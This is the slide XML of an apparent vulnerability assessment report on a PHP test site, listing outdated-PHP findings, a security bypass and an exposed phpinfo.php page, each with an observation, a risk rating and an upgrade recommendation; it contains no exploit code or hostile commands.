              <a:t>PHP &lt; 5.3.2 / 5.2.13 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="531" name="Google Shape;531;p65"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341121"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="383600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2219450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP installed on the remote host is older than 5.3.2 / 5.2.13. Such versions may be affected by several security issues :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- Directory paths not ending with '/' may not be correctly validated inside 'tempnam()' in 'safe_mode' configuration.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- It may be possible to bypass the 'open_basedir'/ 'safe_mode' configuration restrictions due to an error in session extensions.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- An unspecified vulnerability affects the LCG entropy.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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3600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                                HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1106350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The LCG in php before 5.32/5.2.13 does not provide the expected entropy, which makes it easier for context-dependent attackers to guess values that were intended to be unpredictable, as demonstrated by session cookies generated by using the uniqid function.</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83600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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852300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to PHP version 5.3.2 / 5.2.13 or later.</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532" name="Google Shape;532;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210697" y="3936274"/>
            <a:ext cx="487680" cy="391886"/>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533" name="Google Shape;533;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11025051" y="3936274"/>
            <a:ext cx="487680" cy="391886"/>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534" name="Google Shape;534;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9265920" y="3936274"/>
            <a:ext cx="487680" cy="391886"/>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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556041" y="892193"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP &lt; 5.3.2 / 5.2.13 Multiple Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Google Shape;540;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001486" y="1924594"/>
            <a:ext cx="9727474" cy="2177143"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.3.2 / 5.2.13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634418" y="883484"/>
            <a:ext cx="7647433" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>23. PHP PHP_RSHUTDOWN_FUNCTION Security Bypass</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="546" name="Google Shape;546;p67"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341122"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="365225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2434900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its banner, the version of PHP 5.x installed on the remote host is 5.x prior to 5.3.11 or 5.4.x prior to 5.4.1 and thus, is potentially affected by a security bypass vulnerability.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An error exists related to the function 'PHP_RSHUTDOWN_FUNCTION' in the libxml extension and the 'stream_close' method.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Note that this plugin has not attempted to exploit this issue, but has instead relied only on PHP's self-reported version number.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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65225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                         </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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647925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>This issue allows a remote attacker to bypass 'open_basedir' protections and obtain sensitive information.</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65225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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805575">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to PHP version 5.3.11 / 5.4.1or later.</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547" name="Google Shape;547;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7289074" y="4162697"/>
            <a:ext cx="452846" cy="348343"/>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548" name="Google Shape;548;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="4162697"/>
            <a:ext cx="452846" cy="348343"/>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549" name="Google Shape;549;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9326880" y="4162696"/>
            <a:ext cx="452846" cy="348343"/>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68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="892193"/>
            <a:ext cx="8447750" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>22. PHP PHP_RSHUTDOWN_FUNCTION Security Bypass</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Google Shape;555;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836023" y="1924595"/>
            <a:ext cx="9649097" cy="224681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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Version source : http://testphp.vulnweb.com/secured/phpinfo.php Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Fixed version : 5.3.11 / 5.4.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="894589"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>24. Web Server info.php / phpinfo.php Detection</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="561" name="Google Shape;561;p69"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341122"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="365225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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809900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Many PHP installation tutorials instruct the user to create a PHP file that calls the PHP function 'phpinfo()' for debugging purposes. Various PHP applications may also include such a file. </a:t>
                      </a:r>
                      <a:endParaRPr sz="14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65225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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2325200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>By accessing such a file, a remote attacker can discover a large amount of information about the remote web server, including :</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>- The username of the user who installed PHP and if they are a SUDO user.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" i="0" sz="1400">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:latin typeface="Quattrocento Sans"/>
                        <a:ea typeface="Quattrocento Sans"/>
                        <a:cs typeface="Quattrocento Sans"/>
                        <a:sym typeface="Quattrocento Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
